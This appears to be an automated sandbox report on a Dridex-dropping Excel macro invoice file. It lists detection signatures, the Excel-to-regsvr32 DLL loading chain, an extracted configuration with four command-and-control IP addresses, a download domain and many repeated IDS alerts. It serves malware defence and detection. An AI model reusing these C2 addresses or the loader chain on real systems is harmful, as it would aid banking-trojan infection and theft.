Loading ...

Play interactive tourEdit tour

Analysis Report INV9698791470-20210111920647.xlsm

Overview

General Information

Sample Name:INV9698791470-20210111920647.xlsm
Analysis ID:338095
MD5:9b7c2b0abf5478ef9a23d9a9e87c7835
SHA1:6931c4b845a8a952699d9cf85b316e3b3d826a41
SHA256:a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Dridex e-Banking trojan
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query network adapater information
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2432 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 1552 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1108 cmdline: -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)
    • DW20.EXE (PID: 2460 cmdline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1804 MD5: 45A078B2967E0797360A2D4434C41DB4)
      • DWWIN.EXE (PID: 2452 cmdline: C:\Windows\system32\dwwin.exe -x -s 1804 MD5: 25247E3C4E7A7A73BAEEA6C0008952B1)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 10444", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 4", "77.220.64.37:443", "80.86.91.27:3308", "5.100.228.233:3389", "46.105.131.65:1512"]}

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: BlueMashroom DLL LoadShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2432, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll., ProcessId: 1552
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2432, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll., ProcessId: 1552
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2432, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll., ProcessId: 1552

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Found malware configurationShow sources
Source: 4.2.regsvr32.exe.460000.2.unpackMalware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 10444", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 4", "77.220.64.37:443", "80.86.91.27:3308", "5.100.228.233:3389", "46.105.131.65:1512"]}
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zipReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\deibsjhv.dllReversingLabs: Detection: 32%
Multi AV Scanner detection for submitted fileShow sources
Source: INV9698791470-20210111920647.xlsmVirustotal: Detection: 29%Perma Link
Source: INV9698791470-20210111920647.xlsmReversingLabs: Detection: 17%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\deibsjhv.dllJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zipJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49173 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49177 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49181 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49185 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49189 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49193 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49197 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49201 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49205 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49209 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49213 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49217 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49221 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49226 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49231 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49235 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49239 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49243 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49247 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49251 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49255 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49259 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49263 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49267 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49271 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49275 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49279 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49283 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49287 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49291 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49295 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49299 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49303 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49307 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49311 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49315 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49319 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49323 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49327 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49331 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49335 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49339 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49343 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49347 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49351 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49355 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49359 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49363 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49367 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49371 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49375 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49379 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49383 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49387 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49391 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49395 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49399 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49403 version: TLS 1.2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0048CEF8 FindFirstFileExW,

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\deibsjhv.dllJump to behavior
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: eb3kd1le[1].zip.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
Source: global trafficDNS query: name: inmindppe.com
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 77.220.64.37:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 160.153.133.116:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49168
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49170
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49171
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49171
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49173
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49174
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49175
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49175
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49177
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49178
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49179
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49179
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49181
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49182
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49183
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49183
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49185
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49186
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49187
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49187
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49189
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49190
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49191
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49191
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49193
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49194
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49195
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49195
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49197
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49198
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49199
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49199
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49201
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49202
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49203
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49203
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49205
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49206
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49207
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49207
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49209
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49210
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49211
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49211
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49213
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49214
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49215
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49215
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49217
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49218
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49219
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49219
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49221
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49222
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49223
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49223
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49226
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49228
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49229
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49229
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49231
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49232
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49233
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49233
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49235
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49236
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49237
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49237
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49239
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49240
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49241
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49241
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49243
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49244
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49245
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49245
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49247
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49248
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49249
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49249
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49251
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49252
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49253
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49253
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49255
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49256
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49257
